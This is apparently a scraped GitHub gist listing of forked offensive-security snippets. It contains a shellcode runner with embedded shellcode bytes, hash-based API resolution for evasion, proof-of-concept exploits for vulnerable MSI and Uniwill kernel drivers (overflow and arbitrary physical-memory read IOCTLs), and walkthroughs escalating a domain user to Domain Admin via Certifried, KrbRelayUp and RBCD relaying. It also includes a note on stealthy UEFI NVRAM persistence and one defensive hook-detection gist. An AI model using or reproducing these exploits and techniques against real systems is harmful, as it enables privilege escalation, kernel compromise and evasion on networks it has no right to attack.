Persist data in UEFI NVRAM variables.
- Stealthy way to store secrets and other data in UEFI.
- Will survive a reimaging of the operating system.
cvlabsio
cvlabsio
/ _README.md
Created
October 19, 2022 04:44
— forked from jthuraisamy/_README.md
GospelRoom: Data Storage in UEFI NVRAM Variables
cvlabsio
/ certifried_with_krbrelayup.md
Created
October 9, 2022 20:49
— forked from tothi/certifried_with_krbrelayup.md
Certifried combined with KrbRelayUp: non-privileged domain user to Domain Admin without adding/pre-owning computer accounts
Certifried (CVE-2022-26923) gives Domain Admin from non-privileged user with the requirement adding computer accounts or owning a computer account. Kerberos Relay targeting LDAP and Shadow Credentials gives a non-privileged domain user on a domain-joined machine local admin access on (aka owning) the machine. Combination of these two: non-privileged domain user escalating to Domain Admin without the requirement adding/owning computer accounts.
The attack below uses only Windows (no Linux tools interacting with the Domain), simulating a real-world attack scenario.
Prerequisites:
cvlabsio
/ take_a_chill.cpp
Created
October 7, 2022 17:39
— forked from alfarom256/take_a_chill.cpp
Slow the fuck down
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <Windows.h> | |
| #include <jobapi2.h> | |
| #include <stdlib.h> | |
| // something something don't use iostream | |
| #include <iostream> | |
| #define IF_ERR(x,y) if(x == y) {std::cout<<"Error! : " << GetLastError() << std::endl; exit(-1);} | |
| int main() { | |
| int x; | |
| std::cout << "Enter PID: "; |
cvlabsio
/ WaitCallback
Created
October 7, 2022 17:39
— forked from alfarom256/WaitCallback
Runs code via WaitForThreadPoolWaitCallbacks
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <windows.h> | |
| #include <stdio.h> | |
| #include <threadpoolapiset.h> | |
| #define LEN 277 | |
| // run calc | |
| unsigned char op[] = | |
| "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" | |
| "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" |
cvlabsio
/ ldr_data_table_entry.rs
Created
October 7, 2022 17:39
— forked from alfarom256/ldr_data_table_entry.rs
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #[repr(C)] | |
| pub struct LDR_DATA_TABLE_ENTRY<'ldte> { | |
| pub _reserved0: [PVOID; 2], | |
| pub in_initialize_order_links: LIST_ENTRY<'ldte>, | |
| // removed PVOID[2] | |
| pub dll_base: PVOID, | |
| pub entry_point: PVOID, | |
| pub _reserved1: [PVOID; 3], // Additional 2 PVOID's go here | |
| pub full_dll_name: UNICODE_STRING, | |
| pub _reserved3: [u8; 8], |
cvlabsio
/ SyscallInstrumentation.cpp
Created
October 7, 2022 17:38
— forked from alfarom256/SyscallInstrumentation.cpp
A detection mechanism for UM syscall hooking done with InstrumentationCallback functions
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <Windows.h> | |
| #define OFFSET_InstrumentationCallbackSp 0x2d0 | |
| #define OFFSET_InstrumentationCallbackPreviousPc 0x2d8 | |
| #define OFFSET_InstrumentationCallbackPreviousSp 0x2e0 | |
| #define OFFSET_InstrumentationCallbackDisabled 0x2ec | |
| #define OFFSET_Instrumentation 0x16b8 | |
| typedef struct SyscallInstrumentation { | |
| BYTE InstrumentationCallbackDisabled; |
cvlabsio
/ Workstation-Takeover.md
Created
October 7, 2022 17:38
— forked from gladiatx0r/Workstation-Takeover.md
From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure
In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished in short by;
- Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
- Relaying that machine authentication to LDAPS for configuring RBCD
- RBCD takeover
The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.
cvlabsio
/ peb_ldr.h
Created
October 7, 2022 17:38
— forked from alfarom256/peb_ldr.h
*Improved* header-only hash-based function resolution pt 3: LdrpHashTable
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #pragma once | |
| #include <Windows.h> | |
| #include <winnt.h> | |
| #include <winternl.h> | |
| static BYTE prelude1[7]{ | |
| 0x4D, 0x8d, 0x4b, 0xf0, // lea r9, [r11-10h] | |
| 0x45, 0x33, 0xc0 // xor r8d, r8d | |
| }; |
cvlabsio
/ Source.cpp
Created
October 7, 2022 17:38
— forked from alfarom256/Source.cpp
MSI KernCoreLib64.sys PoC
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <Windows.h> | |
| #include <stdio.h> | |
| #define GLE( x ) { printf("%s failed with error: %d\n", x , GetLastError()); } | |
| #define IOCTL_TRIGGER_OVERFLOW 0x80102040 | |
| DWORD64 genPattern(BYTE b) { | |
| DWORD64 retVal = b; | |
| retVal |= retVal << 8; | |
| retVal |= retVal << 16; |
cvlabsio
/ source.cpp
Created
October 7, 2022 17:37
— forked from alfarom256/source.cpp
Uniwill SparkIO.sys PoC
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| IOCTL 0x40002004 : Arbitrary Physical Memory Read using MmMapIoSpace | |
| IOCTL 0x40002008 : Close a handle of your choice! + Stack-based Buffer Overflow | |
| IOCTL 0x40002000 : Arbitrary RW to IO ports | |
| */ | |
| #include <Windows.h> | |
| #include <stdio.h> | |
| #define GLE( x ) { printf("%s failed with error: %d\n", x , GetLastError()); } | |
| #define IOCTL_TRIGGER_OVERFLOW 0x40002008 |